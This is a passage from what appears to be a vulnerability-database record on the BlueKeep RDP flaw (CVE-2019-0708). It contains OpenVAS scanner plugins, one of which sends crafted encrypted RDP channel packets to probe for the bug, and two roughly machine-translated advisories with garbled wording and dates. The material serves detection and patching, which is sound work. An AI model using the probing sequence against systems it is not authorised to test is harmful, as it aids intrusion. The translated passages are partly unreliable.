0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2020-06-05T16:27:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0708"], "description": "This host is running Microsoft Windows Remote Desktop Services\n and is prone to the remote code execution vulnerability known as ", "modified": "2020-06-04T00:00:00", "published": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310108611", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108611", "type": "openvas", "title": "Microsoft Windows Remote Desktop Services 'CVE-2019-0708' Remote Code Execution Vulnerability (BlueKeep) - (Remote Active)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108611\");\n script_version(\"2020-06-04T09:02:37+0000\");\n script_cve_id(\"CVE-2019-0708\");\n script_bugtraq_id(108273);\n script_tag(name:\"last_modification\", value:\"2020-06-04 09:02:37 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-07-05 11:44:28 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows Remote Desktop Services 'CVE-2019-0708' Remote Code Execution Vulnerability (BlueKeep) - (Remote Active)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"ms_rdp_detect.nasl\");\n script_require_ports(\"Services/ms-wbt-server\", 3389);\n script_mandatory_keys(\"msrdp/detected\");\n\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/help/4499164\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/help/4499175\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/help/4499149\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/help/4499180\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/help/4500331\");\n script_xref(name:\"URL\", value:\"https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc732713(v=ws.11)\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/108273\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/153133/Microsoft-Windows-Remote-Desktop-BlueKeep-Denial-Of-Service.html\");\n script_xref(name:\"URL\", value:\"https://www.malwaretech.com/2019/05/analysis-of-cve-2019-0708-bluekeep.html\");\n script_xref(name:\"URL\", value:\"https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708\");\n\n script_tag(name:\"summary\", value:\"This host is running Microsoft Windows Remote Desktop Services\n and is prone to the remote code execution vulnerability known as 'BlueKeep'.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a specially crafted request to the target systems\n Remote Desktop Service via RDP and checks the response.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists in Remote Desktop Services\n when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests.\n This vulnerability is pre-authentication and requires no user interaction.\n\n For an in-depth analysis and further technical insights and details please see the references.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to execute arbitrary code on the target system.\n An attacker could then install programs, view, change, or delete data, or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7\n\n - Microsoft Windows Server 2008 R2\n\n - Microsoft Windows Server 2008\n\n - Microsoft Windows Server 2003 R2\n\n - Microsoft Windows Server 2003\n\n - Microsoft Windows Vista and Microsoft Windows XP (including Embedded)\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\n\n As a workaround enable Network Level Authentication (NLA) on systems running supported\n editions of Windows 7, Windows Server 2008, and Windows Server 2008 R2.\n\n NOTE: After enabling NLA affected systems are still vulnerable to Remote Code Execution (RCE)\n exploitation if the attacker has valid credentials that can be used to successfully authenticate.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"rdp.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"dump.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"bin.inc\");\n\n# nb: Available since r25570 of libs 9.0\nif( ! defined_func( \"rsa_public_encrypt\" ) )\n exit( 0 );\n\nport = get_port_for_service( default:3389, proto:\"ms-wbt-server\" );\n\nif( get_kb_item( \"rdp/\" + port + \"/isxrdp\" ) )\n exit( 0 );\n\nif( ! soc = open_sock_tcp( port, transport:ENCAPS_IP ) ) # nb: Currently don't get a response back after sending the rdp_create_pdu_negotiation_request() request if SSL/TLS is used\n exit( 0 );\n\nreq = rdp_create_pdu_negotiation_request( use_cookie:TRUE );\nres = rdp_send_recv( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_negotiation_request()\" );\nlen = strlen( res );\n\n# nb: Length depends on if a mstshash Cookie was passed.\n# Without a cookie length is 11\n# With a cookie the length might be 11 or 19\n# see https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/13757f8f-66db-4273-9d2c-385c33b1e483\nif( ! res || ( len != 11 && len != 19 ) || hexstr( res ) !~ \"^030000\" ) {\n close( soc );\n exit( 0 );\n}\n\nreq = rdp_create_pdu_connect_initial_request();\nres = rdp_send_recv( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_connect_initial_request()\" );\nif( ! res ) {\n close( soc );\n exit( 0 );\n}\n\nsrv_data = rdp_parse_serverdata( data:res, debug:FALSE );\nif( ! srv_data ) {\n close( soc );\n exit( 0 );\n}\n\nreq = rdp_create_pdu_erect_domain_request();\nrdp_send( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_erect_domain_request()\" );\n\nreq = rdp_create_pdu_attach_user_request();\nres = rdp_send_recv( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_attach_user_request()\" );\nif( ! res || strlen( res ) < 11 ) {\n close( soc );\n exit( 0 );\n}\n\nuser1 = substr(res, 9, 11);\n\nforeach id( make_list( 1009, 1003, 1004, 1005, 1006, 1007, 1008 ) ) {\n req = rdp_create_pdu_channel_request( user1:user1, channel_id:id, debug:FALSE );\n rdp_send_recv( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_channel_request()\" );\n}\n\nclient_rand = rdp_create_client_random();\n\nreq = rdp_create_pdu_security_exchange( client_rand:client_rand,\n public_exponent:srv_data[\"public_exponent\"],\n modulus:srv_data[\"modulus\"],\n bitlen:srv_data[\"bitlen\"] );\nrdp_send( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_security_exchange()\" );\n\nclient_info_pkt = rdp_create_pdu_client_info_request();\n\nrc4_keys = rdp_calculate_rc4_keys( client_rand:client_rand, server_rand:srv_data[\"server_random\"], debug:FALSE );\n\nclient_confirm_active = rdp_create_pdu_client_confirm_active_request();\n\nsync = rdp_create_pdu_client_synchronize_request( target_user:1009 );\n\ncoop = rdp_build_pdu_client_control_cooperate();\n\nclient_req_control = rdp_create_pdu_client_control_request();\n\nevent_sync = rdp_create_pdu_client_input_event_sychronize_request();\n\nfont_list = rdp_create_pdu_client_font_list_request();\n\n# 0x03 = CHANNEL_FLAG_FIRST | CHANNEL_FLAG_LAST\nx86_payload = rdp_build_virtual_channel_pdu_request( flags:0x03, data:raw_string( 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ) );\nx64_payload = rdp_build_virtual_channel_pdu_request( flags:0x03, data:raw_string( 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ) );\n\n# the whole static data which has to be encrypted\nfull_data = client_info_pkt + client_confirm_active + sync + coop + client_req_control + event_sync + font_list;\nfor( i = 0; i <= 5; i++ ) {\n full_data += x86_payload;\n full_data += x64_payload;\n}\n\nenc_data = rc4_encrypt( key:rc4_keys[\"initial_client_encryptkey_128\"], data:full_data );\n\n# Dissect the encrypted data again\n# TODO: NASL rc4_encrypt currently can't encrypt the data for our purposes so\n# the data needs to be dissected here (see comment in rdp_build_pkt() as well).\nstart = 0;\nend = strlen( client_info_pkt ) - 1;\nenc_client_info_pkt = substr( enc_data, start, end );\nenc_client_info_pkt = rdp_build_pkt( data:client_info_pkt, client_info:TRUE, rdp_sec:TRUE, enc_data:enc_client_info_pkt, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( client_confirm_active ) - 1;\nenc_client_confirm_active = substr( enc_data, start, end );\nenc_client_confirm_active = rdp_build_pkt( data:client_confirm_active, rdp_sec:TRUE, enc_data:enc_client_confirm_active, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( sync ) - 1;\nenc_sync = substr( enc_data, start, end );\nenc_sync = rdp_build_pkt( data:sync, rdp_sec:TRUE, enc_data:enc_sync, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( coop ) - 1;\nenc_coop = substr( enc_data, start, end );\nenc_coop = rdp_build_pkt( data:coop, rdp_sec:TRUE, enc_data:enc_coop, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( client_req_control ) - 1;\nenc_client_req_control = substr( enc_data, start, end );\nenc_client_req_control = rdp_build_pkt( data:client_req_control, rdp_sec:TRUE, enc_data:enc_client_req_control, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( event_sync ) - 1;\nenc_event_sync = substr( enc_data, start, end );\nenc_event_sync = rdp_build_pkt( data:event_sync, rdp_sec:TRUE, enc_data:enc_event_sync, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( font_list ) - 1;\nenc_font_list = substr( enc_data, start, end );\nenc_font_list = rdp_build_pkt( data:font_list, rdp_sec:TRUE, enc_data:enc_font_list, hmackey:rc4_keys[\"mac_key\"] );\n\nenc_x86_payload_list = make_list();\nenc_x64_payload_list = make_list();\n\nfor (i=0; i<=5; i++) {\n start = end + 1;\n end = start + strlen( x86_payload ) - 1;\n enc_x86_payload = substr( enc_data, start, end );\n # 0xed03 = Channel 1005\n enc_x86_payload = rdp_build_pkt( data:x86_payload, rdp_sec:TRUE, channel_id:raw_string( 0x03, 0xed ), enc_data:enc_x86_payload, hmackey:rc4_keys[\"mac_key\"] );\n enc_x86_payload_list[i] = enc_x86_payload;\n\n start = end + 1;\n end = start + strlen( x64_payload ) - 1;\n enc_x64_payload = substr( enc_data, start, end );\n # 0xed03 = Channel 1005\n enc_x64_payload = rdp_build_pkt( data:x64_payload, rdp_sec:TRUE, channel_id:raw_string( 0x03, 0xed ), enc_data:enc_x64_payload, hmackey:rc4_keys[\"mac_key\"] );\n enc_x64_payload_list[i] = enc_x64_payload;\n}\n\nres = rdp_send_recv( socket:soc, data:enc_client_info_pkt, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_info_request() / License packet\" );\n# nb: Windows XP sometimes sends a very large license packet. This is likely\n# some form of license error. When it does this it doesn't send a Server\n# Demand packet. If we wait on one we will time out here and error. We\n# can still successfully check for vulnerability anyway.\nif( ! res || strlen( res ) <= 34 )\n rdp_recv( socket:soc, debug:FALSE, debug_req_name:\"Server Demand packet\" );\n\n# nb: Keep the code here as is and don't raise the received length or e.g. use rdp_send_recv(). For some unknown reason trying\n# to change such things will cause a false negative against Windows XP systems.\nrdp_send( socket:soc, data:enc_client_confirm_active, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_confirm_active_request()\" );\n\nrdp_send( socket:soc, data:enc_sync + enc_coop, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_synchronize_request() and rdp_build_pdu_client_control_cooperate()\" );\n\nrdp_send( socket:soc, data:enc_client_req_control, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_control_request()\" );\n\nrdp_send( socket:soc, data:enc_event_sync, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_input_event_sychronize_request()\" );\n\nrdp_send( socket:soc, data:enc_font_list, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_font_list_request()\" );\n\n# nb: Receive all data / clear the socket before sending the payloads below.\nfor( i = 0; i <= 5; i++ ) {\n _res = rdp_recv( socket:soc );\n if( ! _res )\n recv( socket:soc, length:1024, min:1 );\n}\n\nreport = \"By sending a crafted request the RDP service answered with a 'MCS Disconnect Provider Ultimatum PDU - 2.2.2.3' response which indicates that a RCE attack can be executed.\";\n\nfor( i = 0; i <= 5; i++ ) {\n\n rdp_send( socket:soc, data:enc_x86_payload_list[i], debug:FALSE, debug_req_name:\"x86 payload of rdp_build_virtual_channel_pdu_request()\" );\n rdp_send( socket:soc, data:enc_x64_payload_list[i], debug:FALSE, debug_req_name:\"x64 payload of rdp_build_virtual_channel_pdu_request()\" );\n\n # nb: Don't use rdp_recv() as it might not receive all data due to unexpected RDP packages\n # received where the length calculation from the header doesn't work as expected.\n res = recv( socket:soc, length:2048, min:1 );\n if( res && hexstr( res ) =~ \"^0300000902f0802180$\" ) {\n close( soc );\n security_message( port:port, data:report );\n exit( 0 );\n }\n\n for( j = 0; j<= 3; j++ ) {\n res = recv( socket:soc, length:2048, min:1 );\n if( res && hexstr( res ) =~ \"^0300000902f0802180$\" ) {\n close( soc );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nclose( soc );\nexit( 0 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T12:52:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0708"], "description": "This host is missing a critical security\n update according to Microsoft KB4500331.", "modified": "2019-12-20T00:00:00", "published": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310814894", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814894", "type": "openvas", "title": "Microsoft Windows Remote Desktop Service Remote Code Execution Vulnerability (KB4500331)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814894\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2019-0708\");\n script_bugtraq_id(108273);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-17 15:27:29 +0530 (Fri, 17 May 2019)\");\n script_name(\"Microsoft Windows Remote Desktop Service Remote Code Execution Vulnerability (KB4500331)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4500331.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists when an unauthenticated attacker\n connects to the system using RDP and sends specially crafted requests. The vulnerability\n is known as 'BlueKeep'.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker to\n execute arbitrary code on the target system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows XP SP3\n\n - Microsoft Windows Server 2003 SP2\n\n - Microsoft Windows XP Professional x64 Edition SP2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the\n references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/help/4500331/windows-update-kb4500331\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"\\drivers\\Termdd.sys\");\nif(!fileVer)\n exit(0);\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n if(version_is_less(version:fileVer , test_version:\"5.1.2600.7701\"))\n {\n report = report_fixed_ver(file_checked:sysPath + \"\\drivers\\Termdd.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 5.1.2600.7701\");\n security_message(data:report);\n exit(0);\n }\n}\n\nelse if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0){\n\n if(version_is_less(version:fileVer , test_version:\"5.2.3790.6787\"))\n {\n report = report_fixed_ver(file_checked:sysPath + \"\\drivers\\Termdd.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 5.2.3790.6787\");\n security_message(data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:44:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0708"], "description": "Microsoft released a security advisory to disclose a remote code execution vulnerability in Remote Desktop Services.", "modified": "2020-06-06T00:00:00", "published": "2020-06-05T00:00:00", "id": "OPENVAS:1361412562310108794", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108794", "type": "openvas", "title": "Huawei Data Communication: Remote Code Execution Vulnerability in Some Microsoft Windows Systems (huawei-sa-20190529-01-windows)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108794\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2019-0708\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Remote Code Execution Vulnerability in Some Microsoft Windows Systems (huawei-sa-20190529-01-windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"Microsoft released a security advisory to disclose a remote code execution vulnerability in Remote Desktop Services.\");\n\n script_tag(name:\"insight\", value:\"Microsoft released a security advisory to disclose a remote code execution vulnerability in Remote Desktop Services. An unauthenticated attacker connects to the target system using RDP and sends specially crafted requests to exploit the vulnerability. Successful exploit may cause arbitrary code execution on the target system. (Vulnerability ID: HWPSIRT-2019-05133)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2019-0708.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system.\");\n\n script_tag(name:\"affected\", value:\"OceanStor HVS85T versions V100R001C00\n\nOceanStor HVS88T versions V100R001C00\n\nSMC2.0 versions V500R002C00 V600R006C00\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190529-01-windows-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-05-15T15:21:00", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "2019 5 on 14 September, Microsoft is the emergency release for the Remote Desktop service Remote Desktop Service, RDP, previously known as Terminal Services remote code execution vulnerability CVE-2019-0708 fix, the vulnerability affects some older versions of Windows system such as Windows XP, Windows Server 2003, Windows 7, Windows Server 2008, etc. \nTheoretically, the Remote Desktop Services does not in itself vulnerable to attack, but once attacked, the consequences however could be disastrous. If you still don't know the vulnerability of power, please think about 2017 5 on the outbreak of the WannaCry, also called Wanna Decryptor to. \nCVE-2019-0708 vulnerability simply by pre-authentication, pre-authentication and no user interaction will be able to achieve the attack, which means that it and WannaCry the same, all belong to a\u201cworm\u201dattack. This vulnerability can be through the network worms of the way be utilized, the use of this vulnerability with any malicious software are possible from the infected computer to spread to other vulnerable computers, in a manner and 2017 WannaCry malware spread in a similar way. \nAlthough the Microsoft Security Response Center MSRC temporarily did not find favor with this vulnerability the malicious samples, but still want to be fully prepared. A recent study found that a malicious attacker is likely for this vulnerability to write an exploit program, and embedding it into their own malware. \nThe scope of the impact \n\u00b7 Windows 7; \n\u00b7 Windows Server 2008 R2; \n\u00b7 Windows Server 2008; \n\u00b7 Windows 2003\uff1b \n\u00b7 Windows XP; the \nPlease note: Windows 8 and Windows 10 and later version users are not affected by this vulnerability. \nRepair way \nCan be in Microsoft Security Update Guide found in the support Windows version download, using a supported version of Windows and enable the automatic update client will automatically be protected. \nUnsupported systems including Windows 2003 and Windows XP, if you use an unsupported version, the solution to this vulnerability is the best way to upgrade to the latest version of Windows. Even so, Microsoft is still in the KB4500705 for these unsupported versions of Windows to provide a fix. \nIn the enable network level authentication NLA of affected system may be part of the mitigation could exploit this vulnerability\u201csuspicious\u201dmalware or advanced malicious software threat, because the NLA in the trigger the vulnerability before the need for authentication. However, if the attacker has can be used to successfully authenticate with valid credentials, the affected system is still vulnerable to remote execution code execution RCE of the attack. \nFor these reasons, Microsoft strongly recommends that all affected systems, whether NLA is enabled, it should be updated soon. \nPossible attack power \nSuccessful exploitation of this vulnerability an attacker can be on the target system, execute arbitrary code, then an attacker can install a malicious program, and then view, change, or delete the target data on the device, and even create a full user permissions to the new account. \nTo exploit this vulnerability method \nTo exploit this vulnerability, an attacker would need to via RDP to the target system the Remote Desktop service to send a send a specially design request. \nReference and source: \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 \nhttps://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/?from=groupmessage&amp;isappinstalled=0 \n\n", "edition": 1, "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "MYHACK58:62201994153", "href": "http://www.myhack58.com/Article/html/3/62/2019/94153.htm", "title": "Microsoft emergency release CVE-2019-0708 vulnerability fixes-bug warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-15T15:21:03", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "1, Overview \n2019 5 May 14, Microsoft officially released the Remote Desktop Services Remote Desktop Services critical remote code execution vulnerability CVE-2019-0708 security patches affected Windows system version in with Remote Desktop enabled when the service is vulnerable to remote code execution attacks. The vulnerability does not require user interaction, i.e., the vulnerability can be exploited to initiate a worm type of attack, similar WannaCry\uff08Morgul\uff09ransomware worm event. Although currently not found the exploits, but after the attacker is likely to be the exploit was added to the malicious code, just like MS17-010\uff08Eternal Blue vulnerabilities, Microsoft is in 2017 3 \u6708 14 release MS17-010 vulnerability patches, 2017 5 May 12, WannaCry\uff08Morgul use of the Eternal Blue vulnerability to spread. \nAccording to the relevant data source statistics, at present, the global public network with nearly 300 multi-million computer to open the 3389 port, i.e. not to change the port of Remote Desktop Services, RDP, for not through the configuration of the reinforcing within the network of more large number of machines open the relevant port services. Therefore, the vulnerability may cause the Internet to a large area of worm propagation, botnet a large area of infection, also be formed within the network of a large area lateral of the mobile attack capability. \n2, the vulnerability described in \nVulnerability ID: CVE-2019-0708 \nThe vulnerability allows an unauthenticated attacker to use Remote Desktop Services to connect to the target system and send well-designed request, use its identity pre-authentication, no user interaction is required to confirm consent to receive a connection defect can be on the target system, execute arbitrary code, covering but not limited to setup, view, change, or delete the target data within the system, or created with the full user permissions to the new account. \nExploitation of this vulnerability need to meet the following conditions: \n1\\. In Windows operating system to enable the Remote Desktop Services Remote Desktop Services, and the failure to promptly install the update patch; and \n2. The attacker through RDP to the target system the Remote Desktop service to send a well-designed request. \n3, the affected range \nThe affected Windows operating system version: \nWindows XP SP3 x86 \nWindows XP Professional x64 edition SP2 \nWindows XP Embedded SP3 x86 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2003 SP2 x86 \nWindows Server 2003 x64 edition SP2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Embedded POSReady 2009 \nWindows Embedded Standard 2009 \n4, repair and mitigation recommendations \n1, as soon as possible to install the vulnerability patch, even if has been disabled Remote Desktop Services[1]. Fig. \n2, if you do not need to use the Remote Desktop service, it is recommended to disable the service. \n3, in an affected version of system enabled on network level authentication, NLA; to enable NLA, the attacker needs to use on the target system to a valid account on the Remote Desktop Services authentication, to successfully exploit the vulnerability. \n4, in the enterprise perimeter or border firewall to deploy the security policy that blocks TCP port 3389. \n5, Security days smart the methyl terminal defense system with an aptitude for production safety operation and maintenance system used in combination, can substantially reduce the exposed surface, forming a threat to defense response of the base frame. \nAppendix A: references \n[1] CVE-2019-0708 | Remote Desktop Services Remote Code Execution Vulnerability \nhttps://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708 \nhttps://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EA \nhttps://support.microsoft.com/en-us/help/4500331/windows-update-kb4500331 \n[2] Acknowledgements: the Remote Desktop Services Remote Code Execution Vulnerability(he UK's National Cyber Security Centre (NCSC)) \nhttps://portal.msrc.microsoft.com/en-us/security-guidance/acknowledgments \n\n", "edition": 1, "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "MYHACK58:62201994154", "href": "http://www.myhack58.com/Article/html/3/62/2019/94154.htm", "title": "Windows remote code execution vulnerability(CVE-2019-0708)early warning-vulnerability 